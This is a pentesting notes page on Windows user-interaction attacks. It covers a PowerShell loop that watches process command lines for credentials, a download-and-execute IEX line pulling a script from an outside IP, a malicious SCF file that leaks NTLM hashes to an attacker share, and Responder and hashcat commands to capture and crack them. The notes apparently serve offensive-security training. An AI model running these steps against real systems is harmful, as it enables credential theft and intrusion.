RIO
  • Welcome
    • RIO
    • Useful Links
  • PENTESTING
    • Methodology
    • Protocols
      • FTP
      • SMB
      • NFS
      • SSH
      • RDP
      • SMTP
      • IMAP / POP3
      • RSYNC
      • SNMP
      • IPMI
      • R-Services
      • WinRM
      • WMI
      • LDAP
    • Databases
      • MySQL
      • MSSQL
      • Oracle TNS
      • PostgreSQL
    • File Transfers
      • Windows
      • Linux
      • Code
      • Misc
    • Password Attacks
      • John The Ripper
      • Hashcat
    • Docker
  • TOOLS
    • Nmap
    • Metasploit
    • BloodHound
    • Other
  • Linux
    • Theory
    • Commands and Utilities
      • Useful Commands
    • Bash Scripting
    • Post-Exploitation
      • Cred Hunting
      • Pivoting
    • Privilege Escalation
  • WINDOWS
    • Theory
      • Security
    • Commands and Utilities
    • PowerShell
    • Post-Exploitation
      • Tools
      • Enumeration
        • System
        • Network
        • Users
        • Groups
        • Processes / Services
        • Permissions
        • Defence
        • Programs
        • Files
      • Access
      • Pivoting
      • Cred Hunting
    • Privilege Escalation
      • Privileges
      • Built-In Groups
        • Backup Operators
        • Server Operators
        • Print Operators
        • DnsAdmins
        • Event Log Readers
      • Privilege Abuse
        • Potatoes
        • SeDebugPrivilege
        • SeTakeOwnershipPrivilege
      • MISC
        • UAC Bypass
        • User-Interaction Attacks
        • Weak Permissions
  • ACTIVE DIRECTORY
    • Theory
      • Terminology
    • Reconnaissance
      • Responder
      • Password Policies
      • DNS
      • Enumeration
        • Users
        • Groups
          • GPO's
        • Shares
        • Domain
        • Trusts
        • ACL
    • Movement
      • Credentials
        • Dumping
          • DCSync
        • Making a Target List
        • Spraying
        • Powershell Remoting
      • Kerberos
        • Kerbrute
        • Kerberoasting
          • Semi-Manual Way
          • Targeted Kerberoasting
        • ASREProasting
        • Forging
          • Golden Ticket
        • Overpass The Hash
        • Pass The Ticket
        • noPAC
      • MITM / Coerced Auths
        • LLMNR, NBT-NS Poisoning
        • PetitPotam
      • DACL Abuse
        • AddMember
        • ForceChangePassword
      • Trust Abuse
        • ExtraSIDs
      • ADCS
      • Printers
        • PrintNightmare
    • Tools
  • Networking
    • Theory
      • Types / Topologies
      • OSI & TCP/IP Models
      • TCP / UDP
      • MAC Addresses
      • IP / Subnetting
      • Proxies
      • ARP
    • Pivoting
      • Port-Forwarding
    • Commands and Utilities
    • Techniques
  • WEB
    • Web Recon
      • Fuzzing
    • DNS
  • CLOUD
    • Google GKE/GCP
      • Theory
Powered by GitBook
On this page
  • Monitoring for Process Command Lines
  • Malicious SCF file
  1. WINDOWS
  2. Privilege Escalation
  3. MISC

User-Interaction Attacks

Here we would talk about some nice-n-easy techniques which requires interaction with meatbags like million types of intercepting creds :3

Monitoring for Process Command Lines

There may be scheduled tasks or other processes being executed which pass credentials on the command line. We can look for process command lines using something like this script below. It captures process command lines every two seconds and compares the current state with the previous state, outputting any differences.

while($true)
{

  $process = Get-WmiObject Win32_Process | Select-Object CommandLine
  Start-Sleep 1
  $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
  Compare-Object -ReferenceObject $process -DifferenceObject $process2

}

Then we are hosting script in out machine at looking at the magic

PS C:\> IEX (iwr 'http://13.13.13.13/procmon.ps1')

Malicious SCF file

An SCF file is a Windows Explorer shortcut used to execute commands. For intercepting hashes:

[Shell]
Command=2
IconFile=\\13.13.13.13\share\legit.ico
[Taskbar]
Command=ToggleDesktop

And then for our good-old-middleman Responder

sudo responder -I eth0
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
PreviousUAC BypassNextWeak Permissions